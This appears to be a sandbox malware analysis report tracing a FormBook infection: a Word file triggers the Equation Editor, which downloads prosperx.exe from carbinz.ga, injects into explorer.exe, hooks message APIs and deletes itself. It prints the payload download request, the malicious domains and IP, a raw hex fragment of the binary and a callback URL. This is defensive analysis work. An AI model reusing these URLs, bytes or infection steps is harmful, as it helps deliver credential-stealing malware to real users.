Jun 10, 2021 16:22:07.916955948 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.916971922 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.916980028 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.917001963 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.917006016 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.917094946 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.917112112 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.917136908 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
Jun 10, 2021 16:22:07.917144060 CEST | 49165 | 80 | 192.168.2.22 | 185.239.243.112
Jun 10, 2021 16:22:07.917154074 CEST | 80 | 49165 | 185.239.243.112 | 192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917160988 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917174101 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917188883 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917318106 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917361021 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917366028 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917397976 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.926475048 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968086958 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968111992 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968127966 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968146086 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968166113 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968188047 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968190908 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968234062 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968250036 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968270063 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968272924 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968287945 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968295097 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968311071 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968339920 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968365908 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968388081 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968405962 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968410015 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968422890 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968430996 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968446970 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968461037 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968604088 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968637943 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968671083 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968687057 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968703032 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968709946 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968724966 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968734980 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968811989 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968847036 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968867064 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968883991 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968899965 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968909025 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968929052 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.969537973 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.969551086 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020128965 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020159960 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020180941 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020201921 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020246029 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020267010 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020689011 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020714998 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020730972 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020737886 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020749092 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020760059 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020770073 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020791054 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020893097 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020920038 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020935059 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020941019 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020953894 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020962000 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020976067 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020997047 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021058083 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021084070 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021092892 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021106005 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021117926 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021126986 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021138906 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021162987 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021208048 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021234989 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021244049 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021259069 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021276951 CEST4916580192.168.2.22185.239.243.112

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
Jun 10, 2021 16:22:07.654036999 CEST  52197        53         192.168.2.22  8.8.8.8
Jun 10, 2021 16:22:07.732378006 CEST  53           52197      8.8.8.8       192.168.2.22
Jun 10, 2021 16:22:07.732547998 CEST  52197        53         192.168.2.22  8.8.8.8
Jun 10, 2021 16:22:07.794118881 CEST  53           52197      8.8.8.8       192.168.2.22
Jun 10, 2021 16:23:26.535474062 CEST  53099        53         192.168.2.22  8.8.8.8
Jun 10, 2021 16:23:26.613518953 CEST  53           53099      8.8.8.8       192.168.2.22
Jun 10, 2021 16:23:47.506222010 CEST  52838        53         192.168.2.22  8.8.8.8
Jun 10, 2021 16:23:47.581491947 CEST  53           52838      8.8.8.8       192.168.2.22
Jun 10, 2021 16:24:08.273709059 CEST  61200        53         192.168.2.22  8.8.8.8
Jun 10, 2021 16:24:08.341054916 CEST  53           61200      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                          Type            Class
Jun 10, 2021 16:22:07.654036999 CEST  192.168.2.22  8.8.8.8  0x2c09    Standard query (0)  carbinz.ga                    A (IP address)  IN (0x0001)
Jun 10, 2021 16:22:07.732547998 CEST  192.168.2.22  8.8.8.8  0x2c09    Standard query (0)  carbinz.ga                    A (IP address)  IN (0x0001)
Jun 10, 2021 16:23:26.535474062 CEST  192.168.2.22  8.8.8.8  0xa14d    Standard query (0)  www.pwagih.com                A (IP address)  IN (0x0001)
Jun 10, 2021 16:23:47.506222010 CEST  192.168.2.22  8.8.8.8  0x2e78    Standard query (0)  www.centerstageacademyaz.com  A (IP address)  IN (0x0001)
Jun 10, 2021 16:24:08.273709059 CEST  192.168.2.22  8.8.8.8  0x2f03    Standard query (0)  www.skip1-dndasasd.com        A (IP address)  IN (0x0001)

DNS Answers

Timestamp                             Source IP  Dest IP       Trans ID  Reply Code      Name                          CName                     Address          Type                    Class
Jun 10, 2021 16:22:07.732378006 CEST  8.8.8.8    192.168.2.22  0x2c09    No error (0)    carbinz.ga                    -                         185.239.243.112  A (IP address)          IN (0x0001)
Jun 10, 2021 16:22:07.794118881 CEST  8.8.8.8    192.168.2.22  0x2c09    No error (0)    carbinz.ga                    -                         185.239.243.112  A (IP address)          IN (0x0001)
Jun 10, 2021 16:23:26.613518953 CEST  8.8.8.8    192.168.2.22  0xa14d    No error (0)    www.pwagih.com                ghs.google.com            -                CNAME (Canonical name)  IN (0x0001)
Jun 10, 2021 16:23:47.581491947 CEST  8.8.8.8    192.168.2.22  0x2e78    No error (0)    www.centerstageacademyaz.com  centerstageacademyaz.com  -                CNAME (Canonical name)  IN (0x0001)
Jun 10, 2021 16:23:47.581491947 CEST  8.8.8.8    192.168.2.22  0x2e78    No error (0)    centerstageacademyaz.com      -                         184.168.131.241  A (IP address)          IN (0x0001)
Jun 10, 2021 16:24:08.341054916 CEST  8.8.8.8    192.168.2.22  0x2f03    Name error (3)  www.skip1-dndasasd.com        none                      none             A (IP address)          IN (0x0001)

HTTP Request Dependency Graph

• carbinz.ga
• www.centerstageacademyaz.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.239.243.112 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 10, 2021 16:22:07.864707947 CEST | 0 | OUT | GET /modex/prosperx.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: carbinz.ga
Connection: Keep-Alive
Jun 10, 2021 16:22:07.916915894 CEST | 2 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Jun 2021 14:22:07 GMT
Content-Type: application/x-msdownload
Content-Length: 245650
Last-Modified: Wed, 09 Jun 2021 23:32:39 GMT
Connection: keep-alive
ETag: "60c14f97-3bf92"
Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 3e 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 b0 3e 42 00
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@U\}t+}FEuH>BHPuuuHr@BSV5>B


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 184.168.131.241 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 10, 2021 16:23:47.782058954 CEST | 304 | OUT | GET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1
Host: www.centerstageacademyaz.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 10, 2021 16:23:48.005733013 CEST | 305 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Thu, 10 Jun 2021 14:23:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: http://centerstage.academy/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE2

Statistics

Behavior


System Behavior

General

Start time: 16:21:35
Start date: 10/06/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f620000
File size: 1424032 bytes
MD5 hash: 95C38D04597050285A18F66039EDB456
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:21:36
Start date: 10/06/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 16:21:37
Start date: 10/06/2021
Path: C:\Users\user\AppData\Roaming\prosper3512.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\prosper3512.exe
Imagebase: 0x400000
File size: 245650 bytes
MD5 hash: CB4947E5C78ADA624D22C28EE9079871
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2086370454.00000000005C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 30%, ReversingLabs
Reputation: low

General

Start time: 16:21:38
Start date: 10/06/2021
Path: C:\Users\user\AppData\Roaming\prosper3512.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\prosper3512.exe
Imagebase: 0x400000
File size: 245650 bytes
MD5 hash: CB4947E5C78ADA624D22C28EE9079871
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2159297947.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2084947742.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2160305551.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2159230882.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                Reputation:low

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:41
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:
                                                                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                                                                File size:3229696 bytes
                                                                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:22:08
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                Imagebase:0x540000
                                                                                                                                                                                                File size:113152 bytes
                                                                                                                                                                                                MD5 hash:9130377F87A2153FEAB900A00EA1EBFF
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343620271.0000000000390000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343505318.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2343583438.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                Reputation:moderate

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:22:15
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:/c del 'C:\Users\user\AppData\Roaming\prosper3512.exe'
                                                                                                                                                                                                Imagebase:0x49eb0000
                                                                                                                                                                                                File size:302592 bytes
                                                                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Code Analysis
